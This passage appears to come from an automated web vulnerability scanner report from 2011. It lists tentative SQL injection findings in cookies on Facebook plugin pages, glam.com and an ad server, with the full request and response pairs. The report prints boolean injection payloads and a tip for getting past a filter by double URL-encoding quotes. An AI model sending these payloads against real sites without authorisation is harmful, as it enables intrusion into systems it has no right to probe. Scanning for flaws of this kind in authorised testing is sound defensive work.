<script type=\"text/javascript\">\n rsi_pub = \'0CE15E9CF251ABFED1E2BCB12FE46271\';\n rsi_site = \'1113C261FAADC37B3C324A49EE1DF4E5\';\n rsi_width = \'300\';\n rsi_height = \'250\';\n<\/script>\n<script type=\"text/javascript\" src=\"http://ads.revsci.net/adserver/rsiads.js\"><\/script>\n<!-- unique_id: 814544, size_id: 300x250 -->"; rubicon_tag_code = rubicon_tag_code.replace(/##RUBICON_CB##/g,rubicon_cb); document.write(rubicon_tag_code); document.write("<script type=\"text/javascript\">oz_sensor_filter=\"domain\";<\/script><script type=\"text/javascript\" defer=\"defer\" src=\"http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js\"><\/script><img src=\"http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"Quantcast\"/><script defer=\"defer\" type=\"text/javascript\">\n{\n    if (Math.floor(Math.random()*100) < 1)\n    {\n        var url;\n        var iframe = (window != top);\n        url = \"http://tap.rubiconproject.com/stats/iframes?pc=7856/12590&ptc=22893&upn=\"+iframe;\n        setTimeout(function(){ new Image().src = url }, 1000);\n    }\n}\n<\/script>\n<script>var _comscore = _comscore || []; _comscore.push({ c1: \"8\", c2: \"6135404\", c3: \"15\", c4: \"12590\", c10: \"3151998\" }); (function() { var s = document.createElement(\"script\"), el = document.getElementsByTagName(\"script\")[0]; s.async = true; s.src = (document.location.protocol == \"https:\" ? \"https://sb\" : \"http://b\") + \".scorecardresearch.com/beacon.js\"; el.parentNode.insertBefore(s, el); })();<\/script><img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/><DIV STYLE=\"height:0px; width:0px; overflow:hidden\"><IFRAME SRC=\"http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html\" FRAMEBORDER=\"0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" SCROLLING=\"NO\" WIDTH=\"0\" HEIGHT=\"0\" style=\"height:0px;
...[SNIP]...

Request 2

GET /a/7856/12590/22893-15.js?cb=0.5460146523546427&rf=http%3A//www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html&keyword=bt/news_home18878509'%20or%201%3d2--%20 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; ruid=154dab7990adc1d6f3372c12^4^1304340334^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=12590^1; csi15=3151650.js^1^1304340335^1304340335; rdk=7725/12338; rdk2=0; ses2=12338^2; csi2=3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:48:00 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 02-May-2011 13:48:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 02-May-2011 13:48:00 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12590^2; expires=Tue, 03-May-2011 04:59:59 GMT; max-age=69119; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151966.js^1^1304340480^1304340480&3151650.js^1^1304340335^1304340335; expires=Mon, 09-May-2011 12:48:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2850

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151966"
...[SNIP]...
<script type=\"text/javascript\">\nvar AdBrite_Title_Color = \'0000FF\';\nvar AdBrite_Text_Color = \'000000\';\nvar AdBrite_Background_Color = \'FFFFFF\';\nvar AdBrite_Border_Color = \'CCCCCC\';\nvar AdBrite_URL_Color = \'008000\';\ntry{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==\'\'?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe=\'\';var AdBrite_Referrer=\'\';}\n<\/script>\n<script type=\"text/javascript\">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(\' src=\"http://ads.adbrite.com/mb/text_group.php?sid=1545296&zs=3330305f323530&ifr=\'+AdBrite_Iframe+\'&ref=\'+AdBrite_Referrer+\'\" type=\"text/javascript\">\');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));<\/script>"; rubicon_tag_code = rubicon_tag_code.replace(/##RUBICON_CB##/g,rubicon_cb); document.write(rubicon_tag_code); document.write("<script type=\"text/javascript\">oz_sensor_filter=\"domain\";<\/script><script type=\"text/javascript\" defer=\"defer\" src=\"http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js\"><\/script><img src=\"http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"Quantcast\"/><script defer=\"defer\" type=\"text/javascript\">\n{\n    if (Math.floor(Math.random()*100) < 1)\n    {\n        var url;\n        var iframe = (window != top);\n        url = \"http://tap.rubiconproject.com/stats/iframes?pc=7856/12590&ptc=22893&upn=\"+iframe;\n        setTimeout(function(){ new Image().src = url }, 1000);\n    }\n}\n<\/script>\n<script>var _comscore = _comscore || []; _comscore.push({ c1: \"8\", c2: \"6135404\", c3: \"15\", c4: \"12590\", c10: \"3152321\" }); (function() { var s = document.createElement(\"script\"), el = document.getElementsByTagName(\"script\")[0]; s.async = true; s.src = (document.location.protocol == \"https:\" ? \"https://sb\" : \"http://b\") + \".scorecardresearc
...[SNIP]...

1.26. http://www.facebook.com/plugins/activity.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14576993'%20or%201%3d1--%20 and 14576993'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/activity.php?site=glam.com&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23CCCCCC HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo214576993'%20or%201%3d1--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.92.93
X-Cnection: close
Date: Mon, 02 May 2011 13:12:16 GMT
Content-Length: 12563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u193663_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; border-color:#cccccc;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="glam.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.glam.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u193663_3"><input value="Sign Up" type="submit" id="u193663_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u193663_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u193663_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_2624b6b0a981374f"><a class="fbImageContainer fbMonitor UIImageBlock_Image
...[SNIP]...

Request 2

GET /plugins/activity.php?site=glam.com&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23CCCCCC HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo214576993'%20or%201%3d2--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.125.83
X-Cnection: close
Date: Mon, 02 May 2011 13:12:17 GMT
Content-Length: 12580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/9Ck4naJeroG.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yg/r/-V2muYq3bAL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script></head><body class="transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="u193784_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; border-color:#cccccc;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="glam.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.glam.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u193784_3"><input value="Sign Up" type="submit" id="u193784_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u193784_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u193784_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_3bdcdca4df106b65"><a class="fbImageContainer fbMonitor UIImageBlock_Ima
...[SNIP]...

1.27. http://www.facebook.com/plugins/facepile.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 33325718'%20or%201%3d1--%20 and 33325718'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/facepile.php?api_key=8744a0ccdce1491c4474dacf75dc2d12 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.myspace.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo233325718'%20or%201%3d1--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.36
X-Cnection: close
Date: Mon, 02 May 2011 12:59:20 GMT
Content-Length: 6107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yg/r/-V2muYq3bAL.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/9Ck4naJeroG.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:372758,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"8240e",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"dWds7":{"type":"css","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yg\/r\/-V2muYq3bAL.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"30YXW":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yk\/r\/9Ck4naJeroG.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yp\/r\/cdWVmNzOH4t.css"}});Bootloader.setResourceMap({"LNwoY":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/UpS8_ZmY8j-.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI
...[SNIP]...

Request 2

GET /plugins/facepile.php?api_key=8744a0ccdce1491c4474dacf75dc2d12 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.myspace.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo233325718'%20or%201%3d2--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.50
X-Cnection: close
Date: Mon, 02 May 2011 12:59:21 GMT
Content-Length: 6085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:372758,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"e3ab7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"dWds7":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yl\/r\/oCCo725NxLN.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"30YXW":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yC\/r\/IhQ1j6zON26.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yK\/r\/5-0-4il9ia5.css"}});Bootloader.setResourceMap({"LNwoY":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/UpS8_ZmY8j-.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEw
...[SNIP]...

1.28. http://www.glam.com/profile [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /profile

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /profile HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:33:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:33:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

Request 2

GET /profile HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:33:53 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:33:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:33:54 GMT
Content-Length: 27726
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.29. http://www.glam.com/register [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /register

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)'; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:16:33 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:16:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:16:33 GMT
Content-Length: 27727
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body class="error404" id="bodyID">
...[SNIP]...

Request 2

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)''; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:17:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:17:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

1.30. http://www.glam.com/register [qcsegs cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /register

Issue detail

The qcsegs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the qcsegs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
